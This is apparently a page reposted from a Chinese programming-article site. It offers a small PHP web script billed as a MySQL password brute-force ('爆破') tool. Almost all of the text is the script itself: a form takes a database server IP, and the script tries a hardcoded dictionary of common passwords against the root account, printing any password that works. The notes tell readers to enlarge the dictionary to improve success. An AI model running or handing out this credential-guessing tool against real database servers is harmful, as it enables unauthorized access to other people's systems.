欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

PHP版Mysql爆破小脚本

程序员文章站 2023-12-16 23:44:34
mysql php版本爆破小脚本 (注意:从代码可以看出用户名是个变量,一般数据库账号不会变,所以用户名没用数组作为字典。密码是用数组作为字典。字典可根据规矩扩展,破解的...

mysql php版本爆破小脚本

(注意:从代码可以看出用户名是个变量,一般数据库账号不会变,所以用户名没用数组作为字典。密码是用数组作为字典。字典可根据规矩扩展,破解的成功与失败,就看你扩展的字典强大不强大了。用法:保存代码为mysqldatabaseblasting.php,浏览器打开就可使用。 )

/*
 *  author:bearcat 2016-10-5
 */
<html>
 <head>
  <title>mysql账号密码爆破工具</title>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
 </head>
 <body>
  <center>
   <br><br>
   <h1>mysqldatabaseblasting(mysql账号密码在线爆破工具 v1.0)</h1>
  <br>
<?php
 if(@$_post['submit']){
   $host = @$_post['host'];
   if($host!=""){
    $username = "root";//用户名字典
    $password = array('','123456','admin','root','ccf304vn'); //密码字典
    echo "<hr><br>--------------------爆破状态--------------------<br>";
    echo "密码错误次数:";
    for ($i=0; $i <= count($password); $i++) {
     if(@mysql_connect($host, $username, $password[$i])){
       echo "<br><br><font color='red'>爆破成功--密码-->".@$password[$i]."</font>";
       break;
     }else{
       echo $i."、";
       continue;
     }
    }
    echo "<br>--------------------爆破结束--------------------<br><hr>";
   }else{
    echo "<script>alert('黑客,输入数据库ip地址')</script>";
   }
 }
?>
<br><br><br><br>
  <form action="mysqldatabaseblasting.php" method="post">
   数据库ip地址:<input type="text" name="host"/>
   <input type="submit" value="爆破" name="submit"/>
  </form>
<center>
</body>
 </html>

上一篇:

下一篇: